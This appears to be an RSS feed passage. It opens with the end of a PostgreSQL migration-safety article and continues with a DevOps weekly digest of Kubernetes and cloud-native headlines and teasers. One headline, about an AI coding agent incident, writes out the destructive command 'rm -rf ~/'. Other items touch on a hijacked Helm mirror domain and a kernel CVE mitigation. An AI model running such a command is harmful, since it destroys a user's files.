          aria-label="Copy link to section"
          data-heading-id="h2-a-migration-checklist-before-you-ship"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Run through this before any production migration:</p>
<ul>
<li>Does every statement set <code>lock_timeout</code>?</li>
<li>Is every index built with <code>CONCURRENTLY</code>, outside a transaction block?</li>
<li>Does any statement rewrite or scan a large table while holding <code>ACCESS EXCLUSIVE</code>? If so, split it with <code>NOT VALID</code> plus <code>VALIDATE</code>, or move to expand-and-contract.</li>
<li>Is the migration backward compatible with the code currently running? It has to be, because old and new code run side by side during a deploy.</li>
<li>Did you test it against a staging database with production-like row counts and a long-running query in another session to trigger the lock queue?</li>
</ul>
<h2 id="h2-next-steps" class="group relative scroll-mt-24">
        <a href="#h2-next-steps" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Next steps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-next-steps"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Pick your worst offender and fix it this week. Grep your migration history for <code>CREATE INDEX</code> without <code>CONCURRENTLY</code> and for <code>ADD COLUMN ... NOT NULL</code>. Those two patterns cause most of the outages.</p>
<p>Then make the safe path the default so people do not have to remember it:</p>
<ul>
<li>Set <code>lock_timeout</code> in <code>postgresql.conf</code> (or per-role) for the account your migrations run as, so a forgotten <code>SET</code> does not cost you an outage.</li>
<li>Add a linter to CI that fails the build on unsafe DDL. If you use Rails, the <a href="https://github.com/ankane/strong_migrations">strong_migrations</a> gem flags these patterns before they merge. Django, Flyway, and Liquibase have similar checks or plugins. For raw SQL, <a href="https://github.com/sbdchd/squawk">squawk</a> lints migration files directly.</li>
<li>Put a slow query holding a read lock into your staging test suite so a missing <code>lock_timeout</code> shows up before production does.</li>
</ul>
<p>The goal is not to memorize every lock level. It is to make the table stay online no matter what a migration does. Set the timeout, build concurrently, expand before you contract, and backfill in batches. Do those four things and the 2am index that took down <code>orders</code> becomes a migration that fails loudly in staging and ships quietly to production.</p>
<p>Sources:</p>
<ul>
<li><a href="https://www.postgresql.org/docs/current/explicit-locking.html">PostgreSQL: Explicit Locking</a></li>
<li><a href="https://www.postgresql.org/docs/current/sql-altertable.html">PostgreSQL: ALTER TABLE</a></li>
<li><a href="https://www.postgresql.org/docs/current/sql-createindex.html#SQL-CREATEINDEX-CONCURRENTLY">PostgreSQL: CREATE INDEX (CONCURRENTLY)</a></li>
</ul>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[DevOps Weekly Digest - Week 23, 2026]]></title>
      <link>https://devops-daily.com/news/2026-week-23</link>
      <description><![CDATA[⚡ Curated updates from Kubernetes, cloud native tooling, CI/CD, IaC, observability, and security - handpicked for DevOps professionals!]]></description>
      <pubDate>Mon, 01 Jun 2026 00:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/news/2026-week-23</guid>
      <category><![CDATA[DevOps News]]></category>
      <content:encoded><![CDATA[<blockquote>
<p>📌 <strong>Handpicked by DevOps Daily</strong> - Your weekly dose of curated DevOps news and updates!</p>
</blockquote>
<hr>
<h2 id="h2-kubernetes" class="group relative scroll-mt-24">
        <a href="#h2-kubernetes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ⚓ Kubernetes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-kubernetes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-dynamic-configuration-for-cloud-native-swift-services" class="group relative scroll-mt-24">
        <a href="#h3-dynamic-configuration-for-cloud-native-swift-services" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Dynamic configuration for cloud native Swift services
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-dynamic-configuration-for-cloud-native-swift-services"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Modern Swift services increasingly run alongside the same cloud native infrastructure stacks that power much of today’s Kubernetes ecosystem — including ConfigMaps, containerized workloads, declarativ</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/01/dynamic-configuration-for-cloud-native-swift-services/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads" class="group relative scroll-mt-24">
        <a href="#h3-scaling-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling StarRocks on Amazon EKS with KEDA and Karpenter for enterprise OLAP workloads
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Financial analytics at enterprise scale is unforgiving. Queries must return in seconds, not minutes. Thousands of finance professionals need concurrent access during monthly close cycles. And when dat</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 AWS Containers Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/containers/scaling-apache-starrocks-on-amazon-eks-with-keda-and-karpenter-for-enterprise-olap-workloads/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security" class="group relative scroll-mt-24">
        <a href="#h3-building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building a cloud native internal developer platform with Kubernetes, GitOps, and supply chain security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Modern software delivery is no longer constrained by application code — it is constrained by the platform that runs it. This article presents the design of a cloud-native Internal Developer Platform (</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/29/building-a-cloud-native-internal-developer-platform-with-kubernetes-gitops-and-supply-chain-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-vm-migration-what-comes-after-the-lift-and-shift" class="group relative scroll-mt-24">
        <a href="#h3-beyond-vm-migration-what-comes-after-the-lift-and-shift" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond VM migration: What comes after the lift-and-shift
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-beyond-vm-migration-what-comes-after-the-lift-and-shift"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I&#39;ve had this conversation dozens of times with infrastructure teams. They&#39;ve just finished, or are deep into, a VM migration off a legacy hypervisor. The hard part is nearly done. Or, so they think.H</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/beyond-vm-migration-what-comes-after-lift-and-shift"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-security-notice-former-helm-apt-mirror-domain-baltocdncom-statement" class="group relative scroll-mt-24">
        <a href="#h3-security-notice-former-helm-apt-mirror-domain-baltocdncom-statement" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Security Notice: Former Helm APT Mirror Domain baltocdn.com Statement
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-security-notice-former-helm-apt-mirror-domain-baltocdncom-statement"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The Helm Security Team has received third-party reports that the ownership on the former community-maintained Debian/Ubuntu APT mirror domain, baltocdn.com, has changed after baltocdn.com&#39;s original r</p>
<p><strong>📅 May 29, 2026</strong> • <strong>📰 Helm Blog</strong></p>
<p><a href="https://helm.sh/blog/security-notice-baltocdn"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-kubernetes-integration-tax-prometheus-cilium-and-production-reality" class="group relative scroll-mt-24">
        <a href="#h3-the-kubernetes-integration-tax-prometheus-cilium-and-production-reality" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Kubernetes integration tax: Prometheus, Cilium and production reality
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-kubernetes-integration-tax-prometheus-cilium-and-production-reality"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I still remember the first time we lost sleep over something that wasn’t a bug. It was a Tuesday. Grafana dashboards showed blank panels for Cilium network metrics. Hubble was working fine — DNS visib</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/28/the-kubernetes-integration-tax-prometheus-cilium-and-production-reality/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kiali-and-mcp-bringing-ai-native-observability-to-red-hat-openshift-service-mesh" class="group relative scroll-mt-24">
        <a href="#h3-kiali-and-mcp-bringing-ai-native-observability-to-red-hat-openshift-service-mesh" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kiali and MCP: Bringing AI-native observability to Red Hat OpenShift Service Mesh
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kiali-and-mcp-bringing-ai-native-observability-to-red-hat-openshift-service-mesh"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The model context protocol (MCP) server for Kubernetes is moving toward technology preview (TP), and it’s bringing a powerhouse integration with it: the Kiali toolset. By integrating Kiali into the MC</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/kiali-and-mcp-bring-ai-native-observability-red-hat-openshift-service-mesh"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-kubernetes-136-with-ryota-sawada" class="group relative scroll-mt-24">
        <a href="#h3-kubernetes-136-with-ryota-sawada" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Kubernetes 1.36, with Ryota Sawada
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-kubernetes-136-with-ryota-sawada"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Ryota Sawada is software engineer at Numtide and the release lead of Kubernetes 1.36 code name Haru. He has over a decade of experience mainly in the finance industry including working on Cloud Native</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 Kubernetes Podcast</strong></p>
<p><a href="https://e780d51f-f115-44a6-8252-aed9216bb521.libsyn.com/kubernetes-136-with-ryota-sawada"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler" class="group relative scroll-mt-24">
        <a href="#h3-gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GPU autoscaling on Kubernetes with KEDA: Building an external scaler
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If you run GPU workloads on Kubernetes — vLLM, Triton, training jobs, or the newer agentic inference stacks — you’ve probably hit a familiar problem: the default autoscaling path still reasons about C</p>
<p><strong>📅 May 27, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/05/27/gpu-autoscaling-on-kubernetes-with-keda-building-an-external-scaler/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-reconciling-the-past-correcting-records-for-unfixed-kubernetes-cves" class="group relative scroll-mt-24">
        <a href="#h3-reconciling-the-past-correcting-records-for-unfixed-kubernetes-cves" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Reconciling the Past: Correcting Records for Unfixed Kubernetes CVEs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-reconciling-the-past-correcting-records-for-unfixed-kubernetes-cves"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The Kubernetes project relies on transparency to empower cluster administrators and security researchers. One important way we do that is by publishing CVE records into the Common Vulnerabilities and </p>
<p><strong>📅 May 26, 2026</strong> • <strong>📰 Kubernetes Blog</strong></p>
<p><a href="https://kubernetes.io/blog/2026/05/26/reconciling-unfixed-kubernetes-cves/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cloud-native" class="group relative scroll-mt-24">
        <a href="#h2-cloud-native" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          ☁️ Cloud Native
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cloud-native"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-coding-agent-horror-stories-the-rm-rf-incident" class="group relative scroll-mt-24">
        <a href="#h3-coding-agent-horror-stories-the-rm-rf-incident" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Coding Agent Horror Stories: The rm -rf ~/ Incident
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-coding-agent-horror-stories-the-rm-rf-incident"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This is Part 2 of our AI Coding Agent Horror Stories series, an in-depth look at real-world security incidents exposing the vulnerabilities in AI coding agents, and how Docker Sandboxes deliver worksp</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/coding-agent-horror-stories-the-rm-rf-incident/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai" class="group relative scroll-mt-24">
        <a href="#h3-how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How IBM Apptio Delivers Data Center Value in the Age of AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As organizations accelerate their adoption of AI and use of hybrid infrastructure, data center efficiency has become a direct constraint of business modernization and growth. Global demand for data ce</p>
<p><strong>📅 Jun 1, 2026</strong> • <strong>📰 Kubecost Blog</strong></p>
<p><a href="https://www.apptio.com/blog/how-ibm-apptio-delivers-data-center-value-in-the-age-of-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-tuning-windows-vm-performance-on-suse-virtualization" class="group relative scroll-mt-24">
        <a href="#h3-tuning-windows-vm-performance-on-suse-virtualization" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Tuning Windows VM Performance on SUSE Virtualization
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-tuning-windows-vm-performance-on-suse-virtualization"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>SUSE Virtualization is a cloud native hyperconverged infrastructure platform solution optimized for running virtual machine and container workloads in the data center, multi-cloud and edge environment</p>
<p><strong>📅 May 31, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/tuning-windows-vm-performance-on-suse-virtualization/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-vmware-hypervisor-deployment-using-maas" class="group relative scroll-mt-24">
        <a href="#h3-vmware-hypervisor-deployment-using-maas" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 VMware hypervisor deployment using MAAS
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-vmware-hypervisor-deployment-using-maas"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most modern datacenters are inherently heterogeneous. VMware environments coexist with container platforms, databases, and other bare-metal workloads, often on the same hardware over several years. Se</p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/vmware-hypervisor-deployment-using-maas"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-4-reasons-to-start-using-image-mode-for-red-hat-enterprise-linux-right-now" class="group relative scroll-mt-24">
        <a href="#h3-4-reasons-to-start-using-image-mode-for-red-hat-enterprise-linux-right-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 4 reasons to start using image mode for Red Hat Enterprise Linux right now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-4-reasons-to-start-using-image-mode-for-red-hat-enterprise-linux-right-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Nearly two years ago, we launched image mode for Red Hat Enterprise Linux (RHEL) to give customers a simpler way to deploy the foundation of their IT enterprise. Since then, I’ve heard users who have </p>
<p><strong>📅 May 28, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/4-reasons-start-using-image-mode-red-hat-enterprise-linux-right-now"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-mitigating-cve-2026-31431-copy-fail-in-docker-engine" class="group relative scroll-mt-24">
        <a href="#h3-mitigating-cve-2026-31431-copy-fail-in-docker-engine" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Mitigating CVE-2026-31431 (“Copy Fail”) in Docker Engine
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-mitigating-cve-2026-31431-copy-fail-in-docker-engine"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>CVE-2026-31431 is a Linux kernel vulnerability that was recently disclosed. This CVE does not compromise Docker infrastructure. That said, Docker Engine&#39;s default profiles prior to v29.4.3 allowed con</p>
